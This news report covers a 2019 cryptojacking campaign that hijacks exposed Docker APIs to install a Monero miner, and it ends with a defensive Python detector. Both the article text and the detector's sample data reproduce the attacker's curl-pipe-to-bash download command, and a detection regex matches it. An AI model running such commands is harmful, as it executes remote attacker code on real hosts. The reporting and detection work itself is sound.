28 November 2019 | AtoZ Markets – The mass-scanning operation began last weekend, on November 24, and immediately stood out because of its scale. The scanning lets the hacker group send commands to exposed Docker instances and deploy a cryptocurrency miner on a company's Docker hosts, generating funds for the group.
Hackers Mining Monero
"Bad Packets CTI API users will notice that the exploitation activity is targeting the exposed Docker instances, but it is not new and happens quite often," Troy Mursch, research director and co-founder of Bad Packets LLC, told ZDNet.
"As others have noted, this is not an average attempt by a child," said Mursch, who discovered the campaign. "There has been a moderate level of effort in this campaign, and we have not yet analyzed all of its activities."
Bad Packets Report (@bad_packets) tweeted on November 25, 2019:

Opportunistic mass scanning activity detected targeting exposed Docker API endpoints.
These scans create a container using an Alpine Linux image, and execute the payload via:
"Command": "chroot /mnt /bin/sh -c 'curl -sL4 https://t.co/q047bRPUyj | bash;'",
#threatintel
The group behind these attacks is currently scanning more than 59,000 netblocks (IP networks) for exposed Docker instances. Once it identifies an exposed host, the attackers use the API endpoint to boot an Alpine Linux container and run the command chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash' inside it.
That command downloads and executes a Bash script from the attacker's server, which installs a classic XMRig cryptocurrency miner. In the two days since the campaign launched, the hackers had already mined 14.82 Monero (XMR), worth just over $740, Mursch said. The operation is also accompanied by a measure of self-defense.
"A non-original but interesting feature of the campaign is that it uninstalls the known monitoring agents and kills a bunch of processes via a script downloaded from http://ix[.]io/1XQh," Mursch said. "While browsing through this script, we find that the hackers disable security products and also stop processes associated with rival cryptocurrency-mining botnets, such as DDG."
Malicious Script Function
Mursch also discovered a malicious script function that scans an infected host for rConfig configuration files, encrypts them and steals them, sending the files back to the group's command-and-control server. Craig H. Rowland, founder of Sandfly Security, also noted that the hackers create backdoor accounts on hacked containers and leave SSH keys behind to facilitate remote access to, and control of, all infected bots.
For the moment, Mursch recommends that users and organizations running Docker instances immediately check whether they are exposing API endpoints on the internet, close those ports, and terminate any unrecognized containers that are running.
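As an added defender-side check (example code written for this article, not Bad Packets' or Docker's own tooling), the following Python flags containers whose create command matches the pattern in the tweet above and lists Docker API listeners in daemon.json that bind every interface. The sample container and daemon.json are constructed; the host-root bind mount (/:/mnt) is an assumption implied by the chroot /mnt payload, not something the article states.

```python
import json
import re
from typing import Dict, List

# Indicators drawn from the campaign as described above: a container that
# chroots into a mounted filesystem and pipes a curl download straight into bash.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b")
CHROOT_MOUNT = re.compile(r"\bchroot\s+/\S+")

def flag_container(container: Dict) -> List[str]:
    """Return the reasons a container resembles the cryptojacking payload.

    `container` follows the shape of `docker inspect` output (Config.Cmd,
    HostConfig.Binds); an empty list means nothing matched."""
    cfg = container.get("Config", {})
    cmd = " ".join(cfg.get("Cmd") or [])
    binds = container.get("HostConfig", {}).get("Binds") or []
    reasons = []
    if PIPE_TO_SHELL.search(cmd):
        reasons.append("remote script piped into a shell")
    if CHROOT_MOUNT.search(cmd):
        reasons.append("chroot into a mounted filesystem")
    if any(b.startswith("/:") for b in binds):
        reasons.append("host root bind-mounted into the container")
    return reasons

def exposed_api_hosts(daemon_json: str) -> List[str]:
    """Return the tcp:// listeners in a daemon.json 'hosts' list that bind
    every interface, i.e. expose the Docker API beyond localhost."""
    exposed = []
    for host in json.loads(daemon_json).get("hosts", []):
        if not host.startswith("tcp://"):
            continue
        addr = host[len("tcp://"):].rsplit(":", 1)[0]
        if addr in ("", "0.0.0.0", "::", "[::]"):
            exposed.append(host)
    return exposed

# Constructed sample data mirroring the tweeted payload; not a real capture.
SUSPECT = {
    "Config": {"Image": "alpine",
               "Cmd": ["chroot", "/mnt", "/bin/sh", "-c",
                       "curl -sL4 http://ix.io/1XQa | bash;"]},
    "HostConfig": {"Binds": ["/:/mnt"]},  # assumed bind mount behind chroot /mnt
}
BENIGN = {"Config": {"Image": "nginx:1.17", "Cmd": ["nginx", "-g", "daemon off;"]},
          "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]}}
DAEMON_JSON = '{"hosts": ["tcp://0.0.0.0:2375", "unix:///var/run/docker.sock"]}'

if __name__ == "__main__":
    print("exposed listeners:", exposed_api_hosts(DAEMON_JSON))
    for name, c in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(name, "->", flag_container(c) or ["clean"])
```

On a live host the same functions can be fed the output of `docker inspect` and the contents of /etc/docker/daemon.json; any hit is a container to terminate and a listener to close.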